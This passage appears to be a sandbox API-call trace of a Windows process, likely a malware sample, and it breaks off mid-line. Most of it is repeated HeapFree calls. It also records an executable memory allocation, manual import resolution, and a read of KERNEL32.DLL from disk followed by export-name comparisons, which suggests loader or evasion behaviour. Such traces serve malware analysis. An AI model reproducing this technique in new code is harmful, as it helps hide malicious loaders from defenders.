[0122.692] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3562aa0 | out: hHeap=0x430000) returned 1 [0122.693] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3575cb0 | out: hHeap=0x430000) returned 1 [0122.693] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3588ec0 | out: hHeap=0x430000) returned 1 [0122.694] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x359c0d0 | out: hHeap=0x430000) returned 1 [0122.694] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35af2e0 | out: hHeap=0x430000) returned 1 [0122.694] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35c24f0 | out: hHeap=0x430000) returned 1 [0122.694] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35d5700 | out: hHeap=0x430000) returned 1 [0122.697] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35e8910 | out: hHeap=0x430000) returned 1 [0122.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35fbb20 | out: hHeap=0x430000) returned 1 [0122.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x360ed30 | out: hHeap=0x430000) returned 1 [0122.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3621f40 | out: hHeap=0x430000) returned 1 [0122.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3635150 | out: hHeap=0x430000) returned 1 [0122.702] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3648360 | out: hHeap=0x430000) returned 1 [0122.704] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x365b570 | out: hHeap=0x430000) returned 1 [0122.707] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x366e780 | out: hHeap=0x430000) returned 1 [0122.707] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3681990 | out: hHeap=0x430000) returned 1 [0122.707] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3694ba0 | out: hHeap=0x430000) returned 1 [0122.709] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36a7db0 | out: hHeap=0x430000) returned 1 [0122.710] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36bafc0 | out: hHeap=0x430000) returned 1 [0122.710] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36ce1d0 | out: hHeap=0x430000) returned 1 [0122.710] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36e13e0 | out: hHeap=0x430000) returned 1 [0122.710] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36f45f0 | out: hHeap=0x430000) returned 1 [0122.713] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3707800 | out: hHeap=0x430000) returned 1 [0122.714] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x371aa10 | out: hHeap=0x430000) returned 1 [0122.714] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x372dc20 | out: hHeap=0x430000) returned 1 [0122.714] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3740e30 | out: hHeap=0x430000) returned 1 [0122.718] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3754040 | out: hHeap=0x430000) returned 1 [0122.958] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3767250 | out: hHeap=0x430000) returned 1 [0122.962] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x377a460 | out: hHeap=0x430000) returned 1 [0122.962] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x378d670 | out: hHeap=0x430000) returned 1 [0122.963] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37a0880 | out: hHeap=0x430000) returned 1 [0122.963] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37b3a90 | out: hHeap=0x430000) returned 1 [0122.963] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37c6ca0 | out: hHeap=0x430000) returned 1 [0122.963] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37d9eb0 | out: hHeap=0x430000) returned 1 [0122.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37ed0c0 | out: hHeap=0x430000) returned 1 [0122.967] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38002d0 | out: hHeap=0x430000) returned 1 [0122.967] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38134e0 | out: hHeap=0x430000) returned 1 [0122.969] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38266f0 | out: hHeap=0x430000) returned 1 [0122.971] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3839900 | out: hHeap=0x430000) returned 1 [0122.971] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x384cb10 | out: hHeap=0x430000) returned 1 [0122.975] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x385fd20 | out: hHeap=0x430000) returned 1 [0122.978] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3872f30 | out: hHeap=0x430000) returned 1 [0122.981] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3886140 | out: hHeap=0x430000) returned 1 [0122.981] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3899350 | out: hHeap=0x430000) returned 1 [0122.981] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38ac560 | out: hHeap=0x430000) returned 1 [0122.981] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38bf770 | out: hHeap=0x430000) returned 1 [0122.983] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38d2980 | out: hHeap=0x430000) returned 1 [0122.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38e5b90 | out: hHeap=0x430000) returned 1 [0122.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38f8da0 | out: hHeap=0x430000) returned 1 [0122.986] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x390bfb0 | out: hHeap=0x430000) returned 1 [0122.988] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x391f1c0 | out: hHeap=0x430000) returned 1 [0122.988] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39323d0 | out: hHeap=0x430000) returned 1 [0122.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39455e0 | out: hHeap=0x430000) returned 1 [0122.992] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39587f0 | out: hHeap=0x430000) returned 1 [0123.204] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x396ba00 | out: hHeap=0x430000) returned 1 [0123.206] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x397ec10 | out: hHeap=0x430000) returned 1 [0123.210] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3991e20 | out: hHeap=0x430000) returned 1 [0123.210] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39a5030 | out: hHeap=0x430000) returned 1 [0123.211] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39b8240 | out: hHeap=0x430000) returned 1 [0123.212] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39cb450 | out: hHeap=0x430000) returned 1 [0123.212] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39de660 | out: hHeap=0x430000) returned 1 [0123.214] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39f1870 | out: hHeap=0x430000) returned 1 [0123.215] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a04a80 | out: hHeap=0x430000) returned 1 [0123.217] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a17c90 | out: hHeap=0x430000) returned 1 [0123.218] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a2aea0 | out: hHeap=0x430000) returned 1 [0123.221] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a3e0b0 | out: hHeap=0x430000) returned 1 [0123.223] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a512c0 | out: hHeap=0x430000) returned 1 [0123.226] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a644d0 | out: hHeap=0x430000) returned 1 [0123.230] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a776e0 | out: hHeap=0x430000) returned 1 [0123.236] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a8a8f0 | out: hHeap=0x430000) returned 1 [0123.501] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a9db00 | out: hHeap=0x430000) returned 1 [0123.501] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3ab0d10 | out: hHeap=0x430000) returned 1 [0123.502] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3ac3f20 | out: hHeap=0x430000) returned 1 [0123.504] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3ad7130 | out: hHeap=0x430000) returned 1 [0123.505] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3aea340 | out: hHeap=0x430000) returned 1 [0123.507] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3afd550 | out: hHeap=0x430000) returned 1 [0123.510] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3b10760 | out: hHeap=0x430000) returned 1 [0123.513] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3b23970 | out: hHeap=0x430000) returned 1 [0123.516] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47a690 | out: hHeap=0x430000) returned 1 [0123.517] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0123.521] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0123.522] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0123.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0123.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0123.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0123.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0123.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0123.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0123.525] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0123.525] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0123.525] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0123.525] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0123.525] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0123.525] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0123.525] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0123.526] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0123.526] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0123.526] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0123.526] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db40 | out: hHeap=0x430000) returned 1 [0123.527] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0123.531] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4401d0 | out: hHeap=0x430000) returned 1 [0123.985] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0123.986] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0123.986] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0123.986] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0123.986] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0123.986] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0123.988] GetProcessHeap () returned 0x430000 [0123.989] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438d80 [0123.990] GetProcessHeap () returned 0x430000 [0123.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4490e0 [0123.990] GetProcessHeap () returned 0x430000 [0123.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x440770 [0123.991] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0123.991] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0123.991] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0123.991] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0123.991] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0123.992] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0123.992] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0123.992] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0123.992] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0123.992] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0123.992] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0123.992] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0123.993] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0123.993] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0123.993] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0123.994] GetProcessHeap () returned 0x430000 [0123.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac430) returned 0x45c5f0 [0123.996] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0123.996] ReadFile (in: hFile=0x134, lpBuffer=0x45c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x45c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0124.008] CloseHandle (hObject=0x134) returned 1 [0124.009] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0124.017] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0124.017] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0124.017] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0124.017] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0124.017] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0124.017] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0124.017] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0124.017] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0124.017] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0124.018] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0124.018] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0124.018] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0124.018] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0124.018] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0124.018] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0124.018] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0124.019] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0124.019] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.020] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0124.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0124.021] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0124.021] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0124.022] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", 